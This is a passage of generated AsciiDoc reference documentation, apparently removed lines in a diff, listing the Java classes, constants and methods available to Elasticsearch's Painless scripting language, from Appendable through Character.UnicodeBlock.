-[[painless-api-reference-shared-Appendable]] -==== Appendable -* Appendable {java11-javadoc}/java.base/java/lang/Appendable.html#append(java.lang.CharSequence,int,int)[append](CharSequence, int, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ArithmeticException]] -==== ArithmeticException -* {java11-javadoc}/java.base/java/lang/ArithmeticException.html#()[ArithmeticException]() -* {java11-javadoc}/java.base/java/lang/ArithmeticException.html#(java.lang.String)[ArithmeticException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ArrayIndexOutOfBoundsException]] -==== ArrayIndexOutOfBoundsException -* {java11-javadoc}/java.base/java/lang/ArrayIndexOutOfBoundsException.html#()[ArrayIndexOutOfBoundsException]() -* {java11-javadoc}/java.base/java/lang/ArrayIndexOutOfBoundsException.html#(java.lang.String)[ArrayIndexOutOfBoundsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ArrayStoreException]] -==== ArrayStoreException -* {java11-javadoc}/java.base/java/lang/ArrayStoreException.html#()[ArrayStoreException]() -* {java11-javadoc}/java.base/java/lang/ArrayStoreException.html#(java.lang.String)[ArrayStoreException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Boolean]] -==== Boolean -* static Boolean {java11-javadoc}/java.base/java/lang/Boolean.html#FALSE[FALSE] -* static Boolean {java11-javadoc}/java.base/java/lang/Boolean.html#TRUE[TRUE] -* static int {java11-javadoc}/java.base/java/lang/Boolean.html#compare(boolean,boolean)[compare](boolean, boolean) -* static int {java11-javadoc}/java.base/java/lang/Boolean.html#hashCode(boolean)[hashCode](boolean) -* static boolean {java11-javadoc}/java.base/java/lang/Boolean.html#logicalAnd(boolean,boolean)[logicalAnd](boolean, boolean) -* static boolean {java11-javadoc}/java.base/java/lang/Boolean.html#logicalOr(boolean,boolean)[logicalOr](boolean, boolean) -* static boolean {java11-javadoc}/java.base/java/lang/Boolean.html#logicalXor(boolean,boolean)[logicalXor](boolean, boolean) -* static boolean {java11-javadoc}/java.base/java/lang/Boolean.html#parseBoolean(java.lang.String)[parseBoolean](null) -* static null {java11-javadoc}/java.base/java/lang/Boolean.html#toString(boolean)[toString](boolean) -* static Boolean {java11-javadoc}/java.base/java/lang/Boolean.html#valueOf(boolean)[valueOf](boolean) -* boolean {java11-javadoc}/java.base/java/lang/Boolean.html#booleanValue()[booleanValue]() -* int {java11-javadoc}/java.base/java/lang/Boolean.html#compareTo(java.lang.Boolean)[compareTo](Boolean) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Byte]] -==== Byte -* static int {java11-javadoc}/java.base/java/lang/Byte.html#BYTES[BYTES] -* static byte {java11-javadoc}/java.base/java/lang/Byte.html#MAX_VALUE[MAX_VALUE] -* static byte {java11-javadoc}/java.base/java/lang/Byte.html#MIN_VALUE[MIN_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Byte.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Byte.html#compare(byte,byte)[compare](byte, byte) -* static Byte {java11-javadoc}/java.base/java/lang/Byte.html#decode(java.lang.String)[decode](null) -* static int {java11-javadoc}/java.base/java/lang/Byte.html#hashCode(byte)[hashCode](byte) -* static byte {java11-javadoc}/java.base/java/lang/Byte.html#parseByte(java.lang.String)[parseByte](null) -* static byte {java11-javadoc}/java.base/java/lang/Byte.html#parseByte(java.lang.String,int)[parseByte](null, int) -* static null {java11-javadoc}/java.base/java/lang/Byte.html#toString(byte)[toString](byte) -* static int {java11-javadoc}/java.base/java/lang/Byte.html#toUnsignedInt(byte)[toUnsignedInt](byte) -* static long {java11-javadoc}/java.base/java/lang/Byte.html#toUnsignedLong(byte)[toUnsignedLong](byte) -* static Byte {java11-javadoc}/java.base/java/lang/Byte.html#valueOf(byte)[valueOf](byte) -* static Byte {java11-javadoc}/java.base/java/lang/Byte.html#valueOf(java.lang.String,int)[valueOf](null, int) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int {java11-javadoc}/java.base/java/lang/Byte.html#compareTo(java.lang.Byte)[compareTo](Byte) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-CharSequence]] -==== CharSequence -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* null replaceAll(Pattern, Function) -* null replaceFirst(Pattern, Function) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* null {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() - - -[[painless-api-reference-shared-Character]] -==== Character -* static int {java11-javadoc}/java.base/java/lang/Character.html#BYTES[BYTES] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#COMBINING_SPACING_MARK[COMBINING_SPACING_MARK] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#CONNECTOR_PUNCTUATION[CONNECTOR_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#CONTROL[CONTROL] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#CURRENCY_SYMBOL[CURRENCY_SYMBOL] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DASH_PUNCTUATION[DASH_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DECIMAL_DIGIT_NUMBER[DECIMAL_DIGIT_NUMBER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_ARABIC_NUMBER[DIRECTIONALITY_ARABIC_NUMBER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_BOUNDARY_NEUTRAL[DIRECTIONALITY_BOUNDARY_NEUTRAL] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_COMMON_NUMBER_SEPARATOR[DIRECTIONALITY_COMMON_NUMBER_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_EUROPEAN_NUMBER[DIRECTIONALITY_EUROPEAN_NUMBER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_EUROPEAN_NUMBER_SEPARATOR[DIRECTIONALITY_EUROPEAN_NUMBER_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_EUROPEAN_NUMBER_TERMINATOR[DIRECTIONALITY_EUROPEAN_NUMBER_TERMINATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_LEFT_TO_RIGHT[DIRECTIONALITY_LEFT_TO_RIGHT] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_LEFT_TO_RIGHT_EMBEDDING[DIRECTIONALITY_LEFT_TO_RIGHT_EMBEDDING] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_LEFT_TO_RIGHT_OVERRIDE[DIRECTIONALITY_LEFT_TO_RIGHT_OVERRIDE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_NONSPACING_MARK[DIRECTIONALITY_NONSPACING_MARK] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_OTHER_NEUTRALS[DIRECTIONALITY_OTHER_NEUTRALS] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_PARAGRAPH_SEPARATOR[DIRECTIONALITY_PARAGRAPH_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_POP_DIRECTIONAL_FORMAT[DIRECTIONALITY_POP_DIRECTIONAL_FORMAT] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_RIGHT_TO_LEFT[DIRECTIONALITY_RIGHT_TO_LEFT] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_RIGHT_TO_LEFT_ARABIC[DIRECTIONALITY_RIGHT_TO_LEFT_ARABIC] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_RIGHT_TO_LEFT_EMBEDDING[DIRECTIONALITY_RIGHT_TO_LEFT_EMBEDDING] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_RIGHT_TO_LEFT_OVERRIDE[DIRECTIONALITY_RIGHT_TO_LEFT_OVERRIDE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_SEGMENT_SEPARATOR[DIRECTIONALITY_SEGMENT_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_UNDEFINED[DIRECTIONALITY_UNDEFINED] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#DIRECTIONALITY_WHITESPACE[DIRECTIONALITY_WHITESPACE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#ENCLOSING_MARK[ENCLOSING_MARK] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#END_PUNCTUATION[END_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#FINAL_QUOTE_PUNCTUATION[FINAL_QUOTE_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#FORMAT[FORMAT] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#INITIAL_QUOTE_PUNCTUATION[INITIAL_QUOTE_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#LETTER_NUMBER[LETTER_NUMBER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#LINE_SEPARATOR[LINE_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#LOWERCASE_LETTER[LOWERCASE_LETTER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#MATH_SYMBOL[MATH_SYMBOL] -* static int {java11-javadoc}/java.base/java/lang/Character.html#MAX_CODE_POINT[MAX_CODE_POINT] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MAX_HIGH_SURROGATE[MAX_HIGH_SURROGATE] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MAX_LOW_SURROGATE[MAX_LOW_SURROGATE] -* static int {java11-javadoc}/java.base/java/lang/Character.html#MAX_RADIX[MAX_RADIX] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MAX_SURROGATE[MAX_SURROGATE] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MAX_VALUE[MAX_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Character.html#MIN_CODE_POINT[MIN_CODE_POINT] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MIN_HIGH_SURROGATE[MIN_HIGH_SURROGATE] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MIN_LOW_SURROGATE[MIN_LOW_SURROGATE] -* static int {java11-javadoc}/java.base/java/lang/Character.html#MIN_RADIX[MIN_RADIX] -* static int {java11-javadoc}/java.base/java/lang/Character.html#MIN_SUPPLEMENTARY_CODE_POINT[MIN_SUPPLEMENTARY_CODE_POINT] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MIN_SURROGATE[MIN_SURROGATE] -* static char {java11-javadoc}/java.base/java/lang/Character.html#MIN_VALUE[MIN_VALUE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#MODIFIER_LETTER[MODIFIER_LETTER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#MODIFIER_SYMBOL[MODIFIER_SYMBOL] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#NON_SPACING_MARK[NON_SPACING_MARK] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#OTHER_LETTER[OTHER_LETTER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#OTHER_NUMBER[OTHER_NUMBER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#OTHER_PUNCTUATION[OTHER_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#OTHER_SYMBOL[OTHER_SYMBOL] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#PARAGRAPH_SEPARATOR[PARAGRAPH_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#PRIVATE_USE[PRIVATE_USE] -* static int {java11-javadoc}/java.base/java/lang/Character.html#SIZE[SIZE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#SPACE_SEPARATOR[SPACE_SEPARATOR] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#START_PUNCTUATION[START_PUNCTUATION] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#SURROGATE[SURROGATE] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#TITLECASE_LETTER[TITLECASE_LETTER] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#UNASSIGNED[UNASSIGNED] -* static byte {java11-javadoc}/java.base/java/lang/Character.html#UPPERCASE_LETTER[UPPERCASE_LETTER] -* static int {java11-javadoc}/java.base/java/lang/Character.html#charCount(int)[charCount](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#codePointAt(java.lang.CharSequence,int)[codePointAt](CharSequence, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#codePointAt(char%5B%5D,int,int)[codePointAt](char[], int, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#codePointBefore(java.lang.CharSequence,int)[codePointBefore](CharSequence, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#codePointBefore(char%5B%5D,int,int)[codePointBefore](char[], int, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#codePointCount(java.lang.CharSequence,int,int)[codePointCount](CharSequence, int, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#compare(char,char)[compare](char, char) -* static int {java11-javadoc}/java.base/java/lang/Character.html#digit(int,int)[digit](int, int) -* static char {java11-javadoc}/java.base/java/lang/Character.html#forDigit(int,int)[forDigit](int, int) -* static byte {java11-javadoc}/java.base/java/lang/Character.html#getDirectionality(int)[getDirectionality](int) -* static null {java11-javadoc}/java.base/java/lang/Character.html#getName(int)[getName](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#getNumericValue(int)[getNumericValue](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#getType(int)[getType](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#hashCode(char)[hashCode](char) -* static char {java11-javadoc}/java.base/java/lang/Character.html#highSurrogate(int)[highSurrogate](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isAlphabetic(int)[isAlphabetic](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isBmpCodePoint(int)[isBmpCodePoint](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isDefined(int)[isDefined](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isDigit(int)[isDigit](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isHighSurrogate(char)[isHighSurrogate](char) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isISOControl(int)[isISOControl](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isIdentifierIgnorable(int)[isIdentifierIgnorable](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isIdeographic(int)[isIdeographic](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isJavaIdentifierPart(int)[isJavaIdentifierPart](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isJavaIdentifierStart(int)[isJavaIdentifierStart](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isLetter(int)[isLetter](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isLetterOrDigit(int)[isLetterOrDigit](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isLowerCase(int)[isLowerCase](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isMirrored(int)[isMirrored](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isSpaceChar(int)[isSpaceChar](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isSupplementaryCodePoint(int)[isSupplementaryCodePoint](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isSurrogate(char)[isSurrogate](char) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isSurrogatePair(char,char)[isSurrogatePair](char, char) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isTitleCase(int)[isTitleCase](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isUnicodeIdentifierPart(int)[isUnicodeIdentifierPart](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isUnicodeIdentifierStart(int)[isUnicodeIdentifierStart](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isUpperCase(int)[isUpperCase](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isValidCodePoint(int)[isValidCodePoint](int) -* static boolean {java11-javadoc}/java.base/java/lang/Character.html#isWhitespace(int)[isWhitespace](int) -* static char {java11-javadoc}/java.base/java/lang/Character.html#lowSurrogate(int)[lowSurrogate](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#offsetByCodePoints(java.lang.CharSequence,int,int)[offsetByCodePoints](CharSequence, int, int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#offsetByCodePoints(char%5B%5D,int,int,int,int)[offsetByCodePoints](char[], int, int, int, int) -* static char {java11-javadoc}/java.base/java/lang/Character.html#reverseBytes(char)[reverseBytes](char) -* static char[] {java11-javadoc}/java.base/java/lang/Character.html#toChars(int)[toChars](int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#toChars(int,char%5B%5D,int)[toChars](int, char[], int) -* static int {java11-javadoc}/java.base/java/lang/Character.html#toCodePoint(char,char)[toCodePoint](char, char) -* static char {java11-javadoc}/java.base/java/lang/Character.html#toLowerCase(char)[toLowerCase](char) -* static null {java11-javadoc}/java.base/java/lang/Character.html#toString(char)[toString](char) -* static char {java11-javadoc}/java.base/java/lang/Character.html#toTitleCase(char)[toTitleCase](char) -* static char {java11-javadoc}/java.base/java/lang/Character.html#toUpperCase(char)[toUpperCase](char) -* static Character {java11-javadoc}/java.base/java/lang/Character.html#valueOf(char)[valueOf](char) -* char {java11-javadoc}/java.base/java/lang/Character.html#charValue()[charValue]() -* int {java11-javadoc}/java.base/java/lang/Character.html#compareTo(java.lang.Character)[compareTo](Character) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Character-Subset]] -==== Character.Subset -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Character-UnicodeBlock]] -==== Character.UnicodeBlock -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#AEGEAN_NUMBERS[AEGEAN_NUMBERS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ALCHEMICAL_SYMBOLS[ALCHEMICAL_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ALPHABETIC_PRESENTATION_FORMS[ALPHABETIC_PRESENTATION_FORMS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ANCIENT_GREEK_MUSICAL_NOTATION[ANCIENT_GREEK_MUSICAL_NOTATION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ANCIENT_GREEK_NUMBERS[ANCIENT_GREEK_NUMBERS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ANCIENT_SYMBOLS[ANCIENT_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC[ARABIC] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC_EXTENDED_A[ARABIC_EXTENDED_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC_MATHEMATICAL_ALPHABETIC_SYMBOLS[ARABIC_MATHEMATICAL_ALPHABETIC_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC_PRESENTATION_FORMS_A[ARABIC_PRESENTATION_FORMS_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC_PRESENTATION_FORMS_B[ARABIC_PRESENTATION_FORMS_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARABIC_SUPPLEMENT[ARABIC_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARMENIAN[ARMENIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#ARROWS[ARROWS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#AVESTAN[AVESTAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BALINESE[BALINESE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BAMUM[BAMUM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BAMUM_SUPPLEMENT[BAMUM_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BASIC_LATIN[BASIC_LATIN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BATAK[BATAK] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BENGALI[BENGALI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BLOCK_ELEMENTS[BLOCK_ELEMENTS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BOPOMOFO[BOPOMOFO] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BOPOMOFO_EXTENDED[BOPOMOFO_EXTENDED] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BOX_DRAWING[BOX_DRAWING] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BRAHMI[BRAHMI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BRAILLE_PATTERNS[BRAILLE_PATTERNS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BUGINESE[BUGINESE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BUHID[BUHID] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#BYZANTINE_MUSICAL_SYMBOLS[BYZANTINE_MUSICAL_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CARIAN[CARIAN] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CHAKMA[CHAKMA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CHAM[CHAM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CHEROKEE[CHEROKEE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_COMPATIBILITY[CJK_COMPATIBILITY] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_COMPATIBILITY_FORMS[CJK_COMPATIBILITY_FORMS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_COMPATIBILITY_IDEOGRAPHS[CJK_COMPATIBILITY_IDEOGRAPHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_COMPATIBILITY_IDEOGRAPHS_SUPPLEMENT[CJK_COMPATIBILITY_IDEOGRAPHS_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_RADICALS_SUPPLEMENT[CJK_RADICALS_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_STROKES[CJK_STROKES] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_SYMBOLS_AND_PUNCTUATION[CJK_SYMBOLS_AND_PUNCTUATION] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_UNIFIED_IDEOGRAPHS[CJK_UNIFIED_IDEOGRAPHS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_UNIFIED_IDEOGRAPHS_EXTENSION_A[CJK_UNIFIED_IDEOGRAPHS_EXTENSION_A] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_UNIFIED_IDEOGRAPHS_EXTENSION_B[CJK_UNIFIED_IDEOGRAPHS_EXTENSION_B] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_UNIFIED_IDEOGRAPHS_EXTENSION_C[CJK_UNIFIED_IDEOGRAPHS_EXTENSION_C] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#CJK_UNIFIED_IDEOGRAPHS_EXTENSION_D[CJK_UNIFIED_IDEOGRAPHS_EXTENSION_D] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COMBINING_DIACRITICAL_MARKS[COMBINING_DIACRITICAL_MARKS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COMBINING_DIACRITICAL_MARKS_SUPPLEMENT[COMBINING_DIACRITICAL_MARKS_SUPPLEMENT] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COMBINING_HALF_MARKS[COMBINING_HALF_MARKS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COMBINING_MARKS_FOR_SYMBOLS[COMBINING_MARKS_FOR_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#COMMON_INDIC_NUMBER_FORMS[COMMON_INDIC_NUMBER_FORMS] -* static Character.UnicodeBlock 